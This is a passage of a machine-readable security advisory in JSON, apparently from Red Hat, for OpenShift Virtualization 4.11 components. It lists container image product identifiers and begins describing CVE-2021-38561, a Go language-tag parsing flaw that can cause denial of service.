"8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64" }, "product_reference": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64" }, "product_reference": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64" }, "product_reference": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64" }, "product_reference": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64" }, "product_reference": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64" }, "product_reference": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64" }, "product_reference": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64" }, "product_reference": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64" }, "product_reference": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64" }, "product_reference": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64" }, "product_reference": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64" }, "product_reference": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64" }, "product_reference": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64" }, "product_reference": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64" }, "product_reference": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64" }, "product_reference": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64" }, "product_reference": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64" }, "product_reference": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64" }, "product_reference": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64" }, "product_reference": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64" }, "product_reference": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" }, "product_reference": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", "relates_to_product_reference": "8Base-CNV-4.11" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-38561", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "discovery_date": "2022-06-23T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2100495" } ], "notes": [ { "category": "description", "text": "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang\u0027s library. The overall DoS attack vector depends directly on how the library\u0027s input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, 